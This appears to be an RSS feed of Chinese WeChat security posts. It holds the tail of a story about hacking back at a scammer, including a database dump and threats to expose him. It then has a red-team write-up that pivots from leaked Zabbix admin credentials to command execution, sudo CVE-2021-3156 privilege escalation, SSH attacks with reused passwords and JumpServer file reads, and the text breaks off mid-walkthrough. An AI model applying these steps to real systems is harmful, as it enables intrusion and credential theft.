data-ratio="1.2037037037037037" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=a116fa74&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnp59P9bl4MwuFKiaMl9RpreuIuFiaVuf8agZtPy8uDRe29USx1L0e8MIw%2F640%3Fwx_fmt%3Djpeg"/>170</figcaption></figure><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.5821256038647342" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=7149b0ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnWicF1S9gLgkTzpun1rZFibib0IPXv5fibhgMfX9RAxWL3NuU0auFQUGJEw%2F640%3Fwx_fmt%3Djpeg"/>171</figcaption></figure></section><p style="text-align: center;"><br/></p><p style="text-align: center;"><br/></p><p style="text-align: center;"><br/></p></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我也不知道该怎么概括，总之就是这种刑拘不够、行拘懒得管的百八十块的诈骗，真的是有够恶心。我揣测天津小伙这种货色兴许是被骗之后自己甘愿也做个恶龙，我一开始寻思找链家管家要个小区单元楼群进去找他爸妈去来着。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.1892109500805152" data-s="300,640" style="" data-type="jpeg" data-w="1242" src="https://wechat2rss.xlab.app/img-proxy/?k=570608e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn8sy1EZBpC5fEytbzqxeR3gxSMSdEYgs92mUC0FiaIfibJ9d2tgVvLquw%2F640%3Fwx_fmt%3Djpeg"/>172</figcaption></figure></section><p style="text-align: center;"><br/></p></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">一开始说群狼环伺可能言重了，我都已经做好了跟缅滇地区IP归属对抗的心理准备了，目前看充其量群🐶围绕。</p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">技术上的失误还是有的，一方面是偷懒没准备安卓的管理工具，让天津小伙的剧情简化了许多。另一方面是当时光顾着拖db了，忘了读配置文件，不然可以直接就拿到手机号的来着。</p></section></li><li style="text-align: center;"><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">折腾两周多，群友们纯纯看成连续剧了。我本来寻思吓唬金牌黑客逼他把这个ID交出来，由我成为真正的金牌黑客来着，后来想想算了懒得折腾了，他妈找没找他、他还继不继续干我也不关心了，毕竟人家穿巴宝莉咱穿回力，差点实力。</p><figure style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.0022727272727272" data-s="300,640" style="" data-type="jpeg" data-w="440" src="https://wechat2rss.xlab.app/img-proxy/?k=60463980&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn4zib9lywAzibuvpcZiaB0iafU8uFdtfo8nmmHAicuX1qab9nSwvftYHcYxw%2F640%3Fwx_fmt%3Djpeg"/></figcaption></figure></section><p style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;padding: 0px 10px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><br/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;">173</figure><p><br/></p><p><br/></p></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">科技公司成为一家独大的民生基础设施，你还真就是更没地儿说理去。</p></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1,1,1);font-weight: 500;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">如果你也有一个故事比较多的（冤种）朋友，生活确实比电影更精彩。</p></section></li></ol><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>后记</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">写文章的时候我回去贴吧帖子截图，发现跟我交涉那段时间金哥业务竟然没停，有些内容之前没看到</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.734375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=d1940126&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhndficdAlia6Tv39KpnnYV9oBROlXSFibbZnJmCnsMPbanqiaEO56awFic7wA%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">174</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">金哥恼羞成怒甚至还要冻人家号</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="2.222413793103448" data-s="300,640" style="" data-type="jpeg" data-w="580" src="https://wechat2rss.xlab.app/img-proxy/?k=74d9230c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnXEkjJNvEW9dZ6ZBhE8nyibJM669nWHtoC8ByhickhYhibF6yEgwDYcErA%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">175</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">新的受害者还不止一个</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.66328125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=b01a83ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhn22MVc7rRrM0xlJUJAeqWicUq1LFrmRaClovyict72GNt4W0PibmQkuibTg%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">176</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5984375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=de5252fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnvMqv5qSdxIPia3PRv2PAQCc0ESaS867HmKgxcC9g8q72eI2qfIibLAhw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">177</figcaption></figure><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7296875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=78a9e9bb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnmJpyNhmSy06PzH8FOzmS1tyJGJZncr4c91icYvAQlJBWHFILibr8iaqcw%2F640%3Fwx_fmt%3Dpng"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">178</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">也不知道是他妈压根没跟他说，还是说了他不听。我寻思换个号私聊一下跟他谈谈心来着，他又一直没回复我的消息。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.8243366880146387" data-s="300,640" style="" data-type="jpeg" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=fc438ffe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1g3lZibw4Hq2ZlJibmvCsxhnXvpksib9gS8W3ibPtPFsg5X3dtzk8PdbGrKL6XEygC8QWCUibrBvGv0kw%2F640%3Fwx_fmt%3Djpeg"/></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">179</figcaption></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">我就暂且当做他是醒悟了吧，信息稍稍打码已经是最后的仁慈，被我发现还在当客服的话，金哥啊我可就要毫不犹豫的把你献出去啦。</p><section><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe" data-pluginname="mpprofile" data-weui-theme="light" data-id="MzU1NDYxMTE5OA==" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/4iacC3bS3Zh2hia0MygcYlpHWzcUPoAHzaDDIKykpBpch0BGZ97W1tU2Cqek8IXveYAZXjicOcg6mFKNiavicq9k1oQ/0?wx_fmt=png" data-nickname="王小明的事" data-alias="Struggle_of_a_noob" data-signature="一个脚本小子的自我修行。" data-from="0" data-is_biz_ban="0"></mp-common-profile></section><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;"><br/></p></section><p><br/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484715">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=e3a40e4f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247484715%26idx%3D1%26sn%3Dd6936b23f48f597d2f2389f6d956e171%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 12 Mar 2023 07:30:00 +0800</pubDate>
    </item>
    <item>
      <title>Zabbix与Jumpserver后渗透小记</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247484257&amp;idx=1&amp;sn=7d2f68f1f884545b4ad8cdf85398801d</link>
      <description>来自两位友人的Zabbix与Jumpserver后渗透两则，送给大🔥。</description>
      <content:encoded><![CDATA[<p>
原创 <span>Roc木木&amp;amp;kangkang</span> <span>2022-03-23 23:55</span> <span style="display: inline-block;"></span>
</p>

<p>来自两位友人的Zabbix与Jumpserver后渗透两则，送给大🔥。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=37e3dee7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIl9VzxojER3SqedsYuQsdicZgEhhWM3ERPThNlSekYoYnqp9NMo3vXJQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding: 0 10px;line-height: 1.6;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;word-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#39;PingFang SC&#39;, Cambria, Cochin, Georgia, Times, &#39;Times New Roman&#39;, serif;"><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">Hi all，好久不见。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">本文记录的是两位朋友在工作时遇到的真实场景，原本21年底答应友人A <strong style="font-weight: bold;color: black;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">Roc木木</code></strong> 把文章发公众号的，一拖就是几个月。最近友人B <strong style="font-weight: bold;color: black;"><code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">kangkang</code></strong> 又遇到了一次相似的环境，索性把两位好友写的东西放到一起来整一篇文章。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>TL;DR</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">围绕拿到zabbix web管理员权限之后的后渗透，通过读文件、执行命令等操作获取jumpserver的权限。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;"><span style="display: none;"></span>Roc木木の攻击记录</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">21年底的一次演习活动，本文只记录拿到zabbix权限到拿下内网堡垒机权限的过程。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x01 获取zabbix权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">内网扫描，探测到一个自研的资产监控平台，平台使用Django框架开发，且开了debug模式。触发系统报错后，发现在报错的信息中泄露了zabbix服务器和账号密码。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="169" data-ratio="0.30274361400189215" data-s="300,640" style="width: 558px;height: 169px;" data-type="png" data-w="2114" src="https://wechat2rss.xlab.app/img-proxy/?k=5107d02c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIJHCox8cJic0dXrtrnibBSGIZnB45WPqfVqfjYud9yiaxNUIl49vicrnibCA%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">通过该zabbix账号密码，进入到zabbix的后台，且当前用户为管理员权限。<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="32" data-ratio="0.05698234349919743" data-s="300,640" style="width: 562px;height: 32px;" data-type="png" data-w="2492" src="https://wechat2rss.xlab.app/img-proxy/?k=0738e67c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIEwjBu7Eic6BHR3yWZ4zbgia7nWmKhOiajlRp1ibFxykDvKovcCb3VKD5rg%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">对zabbix系统上监控的主机进行观察和分析，发现jumpserver服务器在zabbix监控主机范围中。<br/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">此时想到wfox关于zabbix权限利用的文章 <a href="http://noahblog.360.cn/zabbixgong-ji-mian-wa-jue-yu-li-yong/，初步猜想应当可以借助zabbix读取jumpserver服务器的文件。" target="_blank">http://noahblog.360.cn/zabbixgong-ji-mian-wa-jue-yu-li-yong/，初步猜想应当可以借助zabbix读取jumpserver服务器的文件。</a></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x02 获取zabbix server权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">老样子，首先添加zabbix脚本，在创建脚本的时候选择zabbix服务器，然后在监测 --&gt; 最新数据下面筛选zabbix server，并下发脚本执行命令，成功获取zabbix服务器权限。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="437" data-ratio="0.7832929782082324" data-s="300,640" style="width: 558px;height: 437px;" data-type="png" data-w="1652" src="https://wechat2rss.xlab.app/img-proxy/?k=684864b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CInln4MkicpyIqW2XHaRyaZ8lwDQ1I3NyHUKsuSCx1FwONSwtJHcXNutQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在zabbix server上尝试利用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix_get</code>命令读取文件，但是出现如下错误：<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="37" data-ratio="0.0670995670995671" data-s="300,640" style="width: 558px;height: 37px;" data-type="png" data-w="1848" src="https://wechat2rss.xlab.app/img-proxy/?k=0a49ca46&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIK5oSXeSvRPrOuFnEyOjiaq4Al7rwDTZffkvRUnL7I5x9GFPjLoeCWkw%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">通过查阅资料且重新检查了一下<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix server</code>的配置后发现，jumpserver是通过<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>进行数据上报，所以只能在接收jumpserver上报数据的<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>服务器上使用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix_get</code>命令，此外还有一种方法是wfox文章中的第6点，通过添加监控项进行文件读取。实际渗透过程中没有注意到这一点，而是通过拿下了<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>服务器权限来实现的文件读取。<br/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x03 获取zabbix proxy服务器权限<span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在获取了<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix server</code>服务器权限后，由于不能直接使用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix_get</code>命令进行读文件，于是尝试先对<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix server</code>服务器进行提权。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">如图所示，服务器是centos，sudo版本为1.8.19p2，遂使用<a href="https://github.com/worawit/CVE-2021-3156项目进行提权。" target="_blank">https://github.com/worawit/CVE-2021-3156项目进行提权。</a></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="119" data-ratio="0.21286370597243492" data-s="300,640" style="width: 559px;height: 119px;" data-type="png" data-w="1306" src="https://wechat2rss.xlab.app/img-proxy/?k=17ec197e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIYISPXUaibhCDmWXXD52TtPE0uUB4TTbK66ztPJk7RAFAelGwPTuUvjQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">直接使用exploit_defaults_mailer.py这个脚本进行提权，但是这个脚本在获取sudo版本的时候有一些bug，需要手动修改一下第141行为当前sudo的版本：<br/></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: rgb(40, 44, 52) url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRqSiaicsPNjwl0NBy9q7ELQPLQOVWH1VRk8x0a1EFLoS4Yjgb4CztYEUsuEnPoKRbrXsJdxbQj9UkqIYrCsT6SricO/640?wx_fmt=svg&#34;) no-repeat scroll 10px 10px / 40px;height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;"> sudo_vers = [<span style="color: #d19a66;line-height: 26px;">1</span>, <span style="color: #d19a66;line-height: 26px;">8</span>, <span style="color: #d19a66;line-height: 26px;">19</span>] <span style="color: #5c6370;font-style: italic;line-height: 26px;"># get_sudo_version()</span><br/></code></pre><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">提权成功：</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="212" data-ratio="0.38" data-s="300,640" style="width: 558px;height: 212px;" data-type="png" data-w="2100" src="https://wechat2rss.xlab.app/img-proxy/?k=f206b02a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CICjEAhOBWSjvl0jj5eGATCR1U2mib2jRNaqggicQMqHeeBg4iaNOTBBnPQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">提权成功后，对主机进行信息收集，发现了一个数据库账号密码（user01/password），且同时发现服务器上存在user01用户，于是尝试用（user01/password）进行横向的SSH爆破，很幸运，成功拿下了<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>服务器的权限。<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="81" data-ratio="0.1448395490026019" data-s="300,640" style="width: 559px;height: 81px;" data-type="png" data-w="2306" src="https://wechat2rss.xlab.app/img-proxy/?k=36b741a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIUScfPTXgfszhlZEuPgVnxhz1KEoLQf6I4w5cLicAicYaEIM5G1qtlGhQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 20px;"><span style="display: none;"></span>0x04 zabbix任意文件读取<span style="display: none;"></span><br/></h3><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">在<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix proxy</code>服务器上，成功利用<code style="font-size: 14px;word-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0 2px;color: #1e6bb8;background-color: rgba(27,31,35,.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;">zabbix_get</code>读取到了jumpserver服务器文件。（此处图片为本地场景复现）</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="282" data-ratio="0.5054347826086957" data-s="300,640" style="width: 558px;height: 282px;" data-type="png" data-w="1840" src="https://wechat2rss.xlab.app/img-proxy/?k=4dd8a660&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh2yoZ6AicicmnWJF9WGa245CIcRdJIGMQ6r7nxWveeRRue6jGRRGMpe0H3DwgGJPb4jsQCLI0svicRdQ%2F640%3Fwx_fmt%3Dpng"/></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0;line-height: 26px;color: black;">于是开始思考如何利用zabbix任意文件读去获取jumpserver服务器权限，首先尝试读取jumpserver的配置文件，配置文件默认位置是：/opt/jumpserver/config/config.txt<br/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-cropselx1="0" data-cropselx2="558" data-cropsely1="0" data-cropsely2="356" data-ratio="0.6388634280476627" data-s="300,640" style="width: 558px;height: 